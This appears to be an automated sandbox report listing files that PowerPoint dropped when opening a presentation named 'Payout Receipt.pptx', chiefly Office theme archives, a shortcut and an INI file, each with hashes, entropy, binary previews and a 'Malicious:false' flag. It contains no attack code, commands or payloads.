                                                                                                                              SSDEEP:49152:NFXdpz4d98p/q5jA4q+9Uf5kx6wHR8WfPJZVhWzH4dRze76YP9nJ7yyAInT76nSY:NFXdKx5sM9SmxHKexZVhutJJVpCSqa0Z
                                                                                                                              MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                                                                                              SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                                                                                              SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                                                                                              SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2591108
                                                                                                                              Entropy (8bit):7.999030891647433
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:ZSBBeAefkpB5iXfQJgi7JBaCCRZ3cM2VDHkvSJO6qzI1tE9Rn:EBI6gbCkMPDHKSJO6qsP6n
                                                                                                                              MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                                                                                              SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                                                                                              SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                                                                                              SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2132545 bytes, 2 files, at 0x44 +A "content.inf" +A "Madison.thmx", flags 0x4, ID 44832, number 1, extra bytes 20 in head, 75 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2148753
                                                                                                                              Entropy (8bit):7.9987997302874785
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:3S7Eynda/aPhPWgYPaNu/I757rju1RAVRe3i89Y7NAc4gdCCg:3S7EyCatWBaNuwi1RuRg9YhT4wVg
                                                                                                                              MD5:466E5851E601CEFA5F84681011165ED0
                                                                                                                              SHA1:0FFCC96B7FCB497CC8494F94703EB60452815414
                                                                                                                              SHA-256:C8B322819A2F84BF80ACD654AAAAC3E08DEBB533B1086021078EFFBA27968A37
                                                                                                                              SHA-512:E10D1D40F5A56E13CDF533E2A544BC762BBDEC2C08178E7129684E13F93DBBAC834C4606BC5821A8D28D48AF4CC855B5DF92D66207D3F85254867C4813D3D164
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....A. .....D............... ...........A. .P?..........}...K..............Jrl .content.inf._H%........Jrl .Madison.thmx..H..dp..[.....@.........5...lIT...\..S.J........Y..BDQQ..P.`B.., Uq.$..>.Q..."..;..<q.....B...2..!..m7h@..z. @#\{.)N...A..$Bd.F.4..6...n{.1%..Cp#e.g.....\..l2..C]n......#sn...s{....$.............lj....}k.( ......(.p.......G...C.C9FQ.X.|..F..L.31.f.../..kP..Q.(..T/.3..E..Q.(..f9................[?..._3+.P.B9...2.B).7>)...........1.S.....(9.>.m.....~s....3.>..L...>K...._?..Y...7......?V.w..3.."e...%..../.9jJ).Q..v,.V..G.....>}gU.:../......H5.f......l7T[U...E..i.Pe...m...4h..g.wp....^...{7......=<.{.{%.ma...{Y^..~.R.xD.....u.;.|S.."....u......N......4.^.2<a~..!.!e.c.L.J1L.jv.l..7.1....R(dhOU.*....m..._Yu.S.s.k.;..}..p.4...k....<}b..=(U.-..k.........4..3.......Rwf.3..N4.r.....r..[4...c....b....i..OI...h.2l%..3..YWt..P......{...b.94l.>.x..Ucx..W.k....Z.|.D..js..|.%.~b.vjs..f..V.f.v...?.O...C.W..e.b...7.i..rv]k...>uO.... H..KHI8I..O
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2738786 bytes, 2 files, at 0x44 +A "content.inf" +A "Integral.thmx", flags 0x4, ID 26156, number 1, extra bytes 20 in head, 106 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2754858
                                                                                                                              Entropy (8bit):7.998611101143596
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:3+eO6OYqspfKnz1J4qgcvFhud2BbPI6fp4q7+lyip3vyUM5ZCFwNn3zMiSfM:386mEfGn4jcvFhD1p4uw1pqUDmn3wiUM
                                                                                                                              MD5:57399106826184403A379F7A9A869AD3
                                                                                                                              SHA1:591AD2D06F93A793441DD6FD18EB7DF02549D7CE
                                                                                                                              SHA-256:3779E325D94B6FA8023669DA99CF47A3169E6648913018886647ECB9E6F735E9
                                                                                                                              SHA-512:70789E2D81F52D734AFE2446EB7E4925E354FCE37BC4BBB4CF0BAE7D215144FE81857A507AFF107740B8AB824A1662812A5D450961C02F9BEF2D3E1768C99F69
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....b.).....D...............,f..........b.)..>..........~...j..............N.. .content.inf...4........N.. .Integral.thmx.h.J`.}..[..... ...Rf....O..{.K........Bx]...t.&..7.........n.A]....!.El7.h..........F..DBX..E+4.....d..Wy.!fR.x).=.U.=...4..U....y.]4y..h.^..i.J2..V.O......@....T......~.u........5..}C....~....,.......S.....n/....<*p.}._...N......O.!...?.......DO.8.........cF..~.......e}...>...I.._.g>............n....[..1....W....7w..........A1.q....................B....{_..:..sm..5.9;G7..i...NM..9.G.O..G...=+.<.........#${..#.r..9.....UN^..W.A...{ts....u...e.^...W.u.[.K.q.y....I8....N...<.W..*.Epu6...V....|.u#.k8S!}...8......v..;4Z.z...o..#./....\.......=.un..~..g..X.:&,.eK. n0.....H.L(..y..H..|..Y.L..\.V.'.-..M...\..-.[%.m......x!O;..sw.z6.....bx]|l..YU@....K..J......\.....Y&..L[.'...i.v..4".5L'...G.z.0E.k.l.%.U...1<...K.....(Wn7.}.j::..e......?{.&...'U.n...O4...4..rS.....F.)......l..G.4)=.7...v...w...bw.L.....E.;3.......e....)c.E......
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 2871083 bytes, 2 files, at 0x44 +A "Celestial.thmx" +A "content.inf", flags 0x4, ID 12122, number 1, extra bytes 20 in head, 101 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2887155
                                                                                                                              Entropy (8bit):7.998455532594825
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:49152:qUwqNNZTcomaX/9ImsCnslPrLI6hzr6BifW7JR4uyIpT/hwnXRtJWmMm1vVGoyqP:qvqR5ms9noPrEKzWB0WMuyIpT/hwnXXF
                                                                                                                              MD5:D7751432D989378FF1072BE65D877256
                                                                                                                              SHA1:90B5BB3EB8B2098E759D52211188B2BDC26E1A1F
                                                                                                                              SHA-256:A1ACF9D982A2531697766E894FAAB8AD73690E87EC341097FB0F5682E1B76E21
                                                                                                                              SHA-512:95A305228692F1ACCF57220C201172588B866D8A0733BAC7EAE6A6FBD4DE8870B4E984F4B677AD6CC8CF03A64D39B90E05EC4A17277E166AF3A5FD8DB7A3714C
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....+.+.....D...............Z/..........+.+..>..............e...KG2........Ns. .Celestial.thmx.....KG2....Ns. .content.inf..P1,k..[.....@........./.UUUUCUU5.UUUUCUUU5PUU.AU4.3464a.D3hU.....W.gnqw....I$<'dN9..3).;yI>H'..g.....'..?.....oh...\,wn..A.a..R}.+...H.r.L..._............m(...j'......$.:......o..*).....@.....B4f..|.....4...`.{#.s./.W.^\.L..]4[.e.[@P.A.....E....ZC.ZOr>.iB....{-.{..R.p..G6.i(.....n.H..k.v..]..,.F.Y].m...s.|8^.....O..C...{.v.Tb....E...ir;Gr...2-!@..3uF%.ec.z8}...*VsS.?.....3.V..8p...L....7z..=...y.....6..\......9..-..OY.1...E.{.o.gw.1.....-...(..Q...;.C\...t.I.c[...6...\.S....,V...2.Z..&...\.$......./=~...UG.V.D..........Ry.ri.....=..........d..+...u...)gY_..........?....m8i..J..~<Ej..*.$).c.../h..'.....yH...g.2.._. .....5z....g..Qa\....w....0.v.O7U...YY2O..4.0.Z..4.-J..a.D.DqY..@3... ...}......].PH..".n[.[....f..+V...lu..%.&.MX(...T...Vl....+6..B....^.f.e..i.J2.{...aM.b.."...|...uV..n.8?.}.X..L....*.e1=E...Y......t
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3256855
                                                                                                                              Entropy (8bit):7.996842935632312
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                              MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                              SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                              SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                              SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, many, 8162257 bytes, 2 files, at 0x44 +A "content.inf" +A "Organic.thmx", flags 0x4, ID 28519, number 1, extra bytes 20 in head, 266 datablocks, 0x1503 compression
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8178537
                                                                                                                              Entropy (8bit):7.998487287228825
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:196608:Uu4B2pbfn0wQZOGTHYuFdzCACe9QWPNZKPmMsDfB8D6T:UuTVfn0BcGTHl9Ce9QWPNZKPmHB8eT
                                                                                                                              MD5:9AED2FBBB427D6FA1A4C0D8909CB3F3F
                                                                                                                              SHA1:2A8BD0BC0B19EA4D194C442A56A4F3C5A5B24846
                                                                                                                              SHA-256:8FBA95D2C1904DFD921417CE8829FA9198CB650E7B1C0E7344743A7007BC22F9
                                                                                                                              SHA-512:DEE6625E3AD33F52A4F9BE4386C718901406A1B834C7BD3CA93D2886F61A26427029FD2C7719925AE7C40C8CEED58C2CB0876A3AA0FB73412BCE6845188F92FA
                                                                                                                              Malicious:false
                                                                                                                              Preview:MSCF.....|.....D...............go...........|..?..........}..................N.. .content.inf.!.........N.. .Organic.thmx.G....{..[..........@....?.TDJE.E..hi.<.$.*.z.....Bh.....>y....~<......33EE.`...V..\.....Q..k..~BjE.6.L...Hn.@d.+.v.....X.y..D..6j...!.e.D%....,...d..rG2..E.".xA../ .....@....`....7.y.$...P..h..x.....-.N.............@...L......:J......h......M....0.<..../........T..1....7N...S.@...*...5.V.`c....B...._.M...7.._.O:....C....iv.........L....R.....F../..,....1.?3B..0O.o..t.....#Q.$%.....f......6.......V[..7.~1...Q..t....m4.&F....p......w...Y.<~~...m..m..t._...|..q.9..._>..^......<(g.Ig..a..i..4.....cUb.JK....[].G..........y..S.P....B.....,+.KL.+,....R..cQz.*.r.r..f....WO....z..w.&.....x.).9xf......i.nLG>.^_Y....U... !'...F.....5R.A/..........).....p..i..z......Ul.(.e....3.G....U`M.#v...`af.../.,yw>...|.....h=3...w&.U...l..;(.d1...BTO...u..h.#....P...T..X..d_|..t...?..1..+......k......}.....LR.-...7t..4.....}j...B\..c'.5br..R....M....F
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 13:52:16 2024, mtime=Fri Oct 4 12:10:37 2024, atime=Fri Oct 4 12:10:34 2024, length=210853, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):541
                                                                                                                              Entropy (8bit):4.728841703960836
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:4xtQl3TuPOcSXsy68CX2hHOTq3vXllbeGaioljAlM8xmsHvRO2EW60lbeGailTjM:8LPOFsGkM7khjAnHw2EEkklLSXhcmV
                                                                                                                              MD5:AD3F81D09EC68912E677DAB20FB2EAD3
                                                                                                                              SHA1:527F2A11AE319CB4B685F5E5BDB25083698E7092
                                                                                                                              SHA-256:E63CA1A7520E95F5CCEF71C9E6E8B4F3ECD9A700ADB089397C949257D87833EC
                                                                                                                              SHA-512:33D435E4D9EAD605D433EC52F4904A77CAA886787E1D8BFDC4D1C53C8EE377CA7A318F41DF46E61FFA1B7C25C714548B9AB78B74A27443F4AC202B2104BBB527
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.... ...Q..=.Y..-...^.....N.^....7......................v.t.2..7..DYRi .PAYOUT~1.PPT..X......GX.vDYRi..............................P.a.y.o.u.t. .R.e.c.e.i.p.t...p.p.t.x.......Z...............-.......Y............F.......C:\Users\user\Desktop\Payout Receipt.pptx..*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.o.u.t. .R.e.c.e.i.p.t...p.p.t.x.`.......X.......841675...........hT..CrF.f4... ....F...../....%..hT..CrF.f4... ....F...../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Generic INItialization configuration [folders]
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):63
                                                                                                                              Entropy (8bit):4.677687812691546
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:H+BRLp2m42QRLp2v:H+3KI
                                                                                                                              MD5:87BC359D052B1D895D2026069F1BE712
                                                                                                                              SHA1:447750D5A869CF523D3690FDC61F38E7C022A200
                                                                                                                              SHA-256:022CFCFDF47E831624FE1E5B6F6B4C4268A43172930F0E5B4D68F013DD178209
                                                                                                                              SHA-512:38AC0CB29F0C7F4A849AEBF99E7C25B85065F683AFE6F492743A336F737624811B5065D8CDEB11EEDCD5F66E9E3953CA238742B1C4022C440ACDB54F0DD15225
                                                                                                                              Malicious:false
                                                                                                                              Preview:[misc]..Payout Receipt.LNK=0..[folders]..Payout Receipt.LNK=0..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1824766
                                                                                                                              Entropy (8bit):7.941741037170679
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:jS2WTsZasyuJiyV0mDUoHLgwPjvv96H8D86IRZ2s4p/H2rDCg+tuXlYMErpGzwZN:OKYlO3BpPTvc8oFZ29/Rg+rrDLr
                                                                                                                              MD5:C5A07069AD7E82F3AEB099F346C4FF62
                                                                                                                              SHA1:39A58834FD8A25AED63FB83F0C00712AFC3BD2F5
                                                                                                                              SHA-256:EB7806D9DC3D2ABF82A061709BCD9DB8DD98FA060E66DAF6820D1FA81BB5B845
                                                                                                                              SHA-512:343FB8BFFA01801EED7289A513564B55B0045FF3D0A842A819CECE416C53C2398D0A0D9B55397BF2EAD5393638085AB6AB83ECB2C701F532BD55C0FED4C98EEC
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........l.%A.f}......p......[Content_Types].xml..n.@.._......8i.'......}.......(y...H}......3Fi..%.......3..._...j.`.2....cod.(...r...w{s..)...]..3..APF.61...6ug.Y...... 7.....d<..Q.V6.N......{.0.U5...>.-..Ko.nw.f...'.....!.s.=fw.{PaW.. ..82.;.<..os....n....>...w..%....P...v...v....'....m.m..3.[.._...:[,...h..!~s..^..Y..E.....^.9Y.j.....#x......3....=....b}4O.*....k7.+.&.Xg.X.X..XSN.KN.+N.7.X....!..CR....I]...>....L...!=...9..!L.0.v.gEo\.......w..No.a.C.q.}<.........a..n./......e.-)h9a..}i.}.."-..C.C.Xq..0?..M4.........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......4....&T......Wlw.b....}..+.A\...q......~.WK.Z^..........>.h..`......}......k..s.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G.....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ...-Z.>X.2.....>8..S.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):787354
                                                                                                                              Entropy (8bit):7.849038074328931
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:RBbqz121ANZ40EdYNyNv3GaNBlHT3pxozHUt3HnpHQPegZ+dNu+7TrlpocfYFWCH:qDNhEYNyJNBlT3pxoz0tAtZ00j
                                                                                                                              MD5:BBACB56BBFFA78CD4A21A9A6B331D84A
                                                                                                                              SHA1:5A854FB2FDFB3BD38DDE1AC7C832BA0FFD46F4F1
                                                                                                                              SHA-256:BD9DE870D21C8A5336ADC759EBFB740E105764810DD4B5B88BCA6213C9133CD7
                                                                                                                              SHA-512:59D798652E181582593B44015803A13F9838EE1C5971D2992F968D314CDB80B77A9869344D9D1FD26C2D8AFC4574DD9145E795DCFDA706E6CF1B49CAB6402C7B
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........x.%A}.4+.....k......[Content_Types].xml..n.@.E_.y.ac $..,........-..g@.u.G.+t.:......A1......=..._..d.....Y:.B...t.e.8]..].....s.M.=.....6...&Z.D.?.u..,."Q.].. W.....p0..Q.Z........Rm7....}\.{.W^.....Z3/N...o.....1'.T.o.HYw?....._,.<<c.qnn...8.:.B9.."^...U.O*q.....>..-]..O...-.q..Y.M...:.M+...}..y..{.0..V'K6.K?Qqz........c^..~GN.*s_..Q=g[k.....8..XCN..'....k.u.u....+..r...!.A....!.Q....a...7U.*uH...!gi=..Y.[.v{&.......q.=.[.v{....k.5.........4Y9..3Y).....v..mi...Wi.~.=G.....t.?.S......bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`...[..u...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C.&2.k...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C..d...*&T9..\..q...W.\...r.?.... .W.C...&+h.r&+f.R.%X..K..-.`.h....e.......zu9JR..7..Y=..6.?PK..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):738429
                                                                                                                              Entropy (8bit):7.8235726750504355
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:MIA7gJFzMeFZaq2fscBNVRFCToZr5RCmUQHr+kRBhFF0s9XH44qTxQXMI:hA7gJFzZ2xBbmsZdRC4Ck19X44qyMI
                                                                                                                              MD5:8EBD58005DAF9C4EC15AC2530D3A4A30
                                                                                                                              SHA1:D11B9F2B85F20EB3DB28C4D9C9FDD909848E3E05
                                                                                                                              SHA-256:D3AB94FDC32B10903AD444F6F3518F93C3D7348FB945168DD8140C74BB7D7E26
                                                                                                                              SHA-512:00A3A6F8A8D10F4BAD87C3BEAE299D0E28931593EF0FB4145711B1D164A3351A8EF131DA0F26AAB9C3EB7AC214B69E1F03CB52E0E1EA95EB444664D5B0B998E9
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........e.$A}.4+.....k......[Content_Types].xml..n.@.E_.y.ac $..,........-..g@.u.G.+t.:......A1......=..._..d.....Y:.B...t.e.8]..].....s.M.=.....6...&Z.D.?.u..,."Q.].. W.....p0..Q.Z........Rm7....}\.{.W^.....Z3/N...o.....1'.T.o.HYw?....._,.<<c.qnn...8.:.B9.."^...U.O*q.....>..-]..O...-.q..Y.M...:.M+...}..y..{.0..V'K6.K?Qqz........c^..~GN.*s_..Q=g[k.....8..XCN..'....k.u.u....+..r...!.A....!.Q....a...7U.*uH...!gi=..Y.[.v{&.......q.=.[.v{....k.5.........4Y9..3Y).....v..mi...Wi.~.=G.....t.?.S......bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`........bB..H.%X.W..r.>.... .W.\...rU?.++i..&+g.b&+e\..h....r.V..^.JZ..j`...[..u...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C.&2.k...UN -.`A\a..U. .W.\...r5?..U..............q.....,D.%X5Zz.*i.....C..d...*&T9..\..q...W.\...r.?.... .W.C...&+h.r&+f.R.%X..K..-.`.h....e.......zu9JR..7..Y=..6.?PK..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3446188
                                                                                                                              Entropy (8bit):7.939078022105486
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:98304:hAABj6t8mC7x/pS6+X3Bzx37OjbqOMhbEsMWII5:ct8mC7x/pS6uBzp5NhAsMWt
                                                                                                                              MD5:AD1C52DB4C29726B3A2D28DDA1110F76
                                                                                                                              SHA1:46A0656C55202A4ADFAAC7E98E9E1340C4A1FD55
                                                                                                                              SHA-256:7973C1386416C251569ACC3CDBFE04DA848262A9A2DA998F915E000BFD6B52B3
                                                                                                                              SHA-512:95C3F09611F977EB3F146C9844D7B96AF3E8123CF3393884CD10EFE7C250F446A565EDAFED1CF1FA6DCAC4D7EADAFACAD134D2A75A8CFB74462F62F5EA8B7400
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........Z&A........a.......[Content_Types].xml...r.`...[a.:%..R.v..p.gh..$d...^../.[0.e..=d....B...c.._?~._>$..}...2.t]...D.ty...I........._....T.M.I..,..APLo.$,z.,J.wf.<...e>..p.=.G......eZFiyT...8....E...P}y}..,.w;...\]k.....o......9(.E<.....>..I;....|.Lq.g....]..g......~>W.<....0/?.I.....g...U.V..3....l.O........m.l...T.....h.GE.......'K....$...z.E..(.Gc.....N......>...b....Z...Y.f.13k..:af..Y..13...........8L....o...s.....k...l.k....K.Z..i[..7mk...m._........~.../.^...{..Z...r@........P.@.....Z..d....R..e.O..jY.S.,..Z..T-K}....Z-^}.}iyS_C.C}.6.w.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_.....}iyS_C.C}C...*....Y.R..uwY.S.,..Z..T-K}...>U.R..e.O..W..o./-o.kha....N.LP..e.O...,..Z..T-K}...>U.R..e.O..jY....w./-o.kha.odC}#...s"kY....K}...>U.R..e.O..jY.S.,..Z..j.x.....M}.-....P....9..,..\[w..>U.R..e.O..jY.S.,..Z..T-K}.Z..N...M}.-...m.o.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_............3..;S0A='...>.k...jY.S.,..Z..T-K}...>U.R..e..V.W.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1593982
                                                                                                                              Entropy (8bit):7.907400454215888
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:zT2WTsZasyuJiyV0mDUoHLgwPjvgpEtrYpXjdHo8dJNgR6MxNTkdXylo:/KYlO3BpPTgpEtkpXJTgHxWuo
                                                                                                                              MD5:407ACAACDD935B4C82A2D4AF73D07744
                                                                                                                              SHA1:E7AB195DF6F9BFD7676C34503E337194DC7631DD
                                                                                                                              SHA-256:ED85105C65F81EC015215B76ECBD46BEE4CAAA17AD716393DFD15D5DCD57A3E4
                                                                                                                              SHA-512:03D30E2357319A8153D242EEE035DDFDA718CE93E00C0D99ECF82C1387D1FE1A436111E13AD1CE67214C87CF4709D68FF452C041772A43CB242786ED4090370A
                                                                                                                              Malicious:false
